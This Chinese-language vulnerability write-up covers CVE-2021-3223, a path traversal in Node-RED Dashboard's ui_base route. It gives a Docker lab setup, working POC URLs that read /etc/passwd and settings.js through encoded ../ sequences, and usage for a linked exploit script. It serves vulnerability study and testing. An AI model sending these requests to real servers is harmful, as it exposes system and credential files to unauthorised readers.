CVE-2021-3223 Node-RED ui_base 任意文件读取漏洞

漏洞概述

Node-RED 在/nodes/ui_base.js中，URL与'/ui_base/js/*'匹配，然后传递给path.join

由于缺乏对最终路径的验证会导致路径遍历漏洞，可以利用这个漏洞读取服务器上的敏感数据，比如settings.js

漏洞影响

Node-RED-Dashboard < 2.26.2

环境搭建

漏洞环境

https://github.com/errorecho/CVEs-Collection/tree/main/CVE-2021-3223/Env

运行漏洞环境

docker-compose up -d

访问http://127.0.0.1:1880/，环境运行成功

漏洞利用

POC

http://your-ip:1880/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
http://your-ip:1880/ui_base/js/..%2f..%2f..%2f..%2fsettings.js

EXP

exp脚本

https://github.com/errorecho/CVEs-Collection/blob/main/CVE-2021-3223/Exp/CVE-2021-3223.py

使用方法

python CVE-2021-3223.py http://your-ip:1880 /etc/passwd outputfile

上一页CVE-2021-25646 Apache Druid 远程代码执行漏洞下一页CVE-2021-27905 Apache Solr 服务端请求伪造漏洞

最后更新于4年前

hashtag漏洞概述

hashtag漏洞影响

hashtag环境搭建

hashtag漏洞利用

hashtagPOC

hashtagEXP

漏洞概述

漏洞影响

环境搭建

漏洞利用

POC

EXP